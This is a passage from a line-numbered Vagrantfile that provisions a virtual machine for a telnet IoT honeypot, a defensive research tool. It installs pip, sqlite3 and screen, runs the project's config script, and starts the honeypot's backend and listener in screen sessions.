pushing to Atlas. Other push strategies 62 | # such as FTP and Heroku are also available. See the documentation at 63 | # https://docs.vagrantup.com/v2/push/atlas.html for more information. 64 | # config.push.define "atlas" do |push| 65 | # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME" 66 | # end 67 | 68 | # Enable provisioning with a shell script. Additional provisioners such as 69 | # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the 70 | # documentation for more information about their specific syntax and use. 71 | config.vm.provision "shell", privileged: 'false', inline: <<-SHELL 72 | sudo apt-get update 73 | sudo apt-get install -y python-pip sqlite3 screen 74 | 75 | cp -r /vagrant_data telnet-iot-honeypot 76 | cd telnet-iot-honeypot 77 | rm database.db 78 | rm config.yaml 79 | 80 | export LC_ALL=C 81 | sudo pip install -r requirements.txt 82 | 83 | sudo bash create_config.sh 84 | SHELL 85 | 86 | config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL 87 | screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" 88 | sleep 5 89 | screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" 90 | screen -list 91 | SHELL 92 | end 93 | 94 | --------------------------------------------------------------------------------